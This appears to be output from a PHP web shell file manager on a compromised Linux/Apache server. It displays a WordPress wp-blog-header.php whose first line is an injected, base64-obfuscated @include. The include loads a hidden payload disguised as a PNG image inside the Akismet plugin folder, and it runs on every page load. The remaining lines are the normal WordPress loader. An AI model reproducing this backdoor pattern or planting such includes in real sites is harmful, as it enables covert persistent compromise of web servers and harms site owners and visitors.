HEX
Server: Apache
System: Linux 103-127-96-167.cprapid.com 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: itsupportgdc (1001)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/itsupportgdc/public_html/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvaXRzdXBwb3J0Z2RjL3B1YmxpY19odG1sL3dwLWNvbnRlbnQvcGx1Z2lucy9ha2lzbWV0L19pbmMvaW1nL2xvZ28tcHNwbnFzb25zLnBuZw==");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}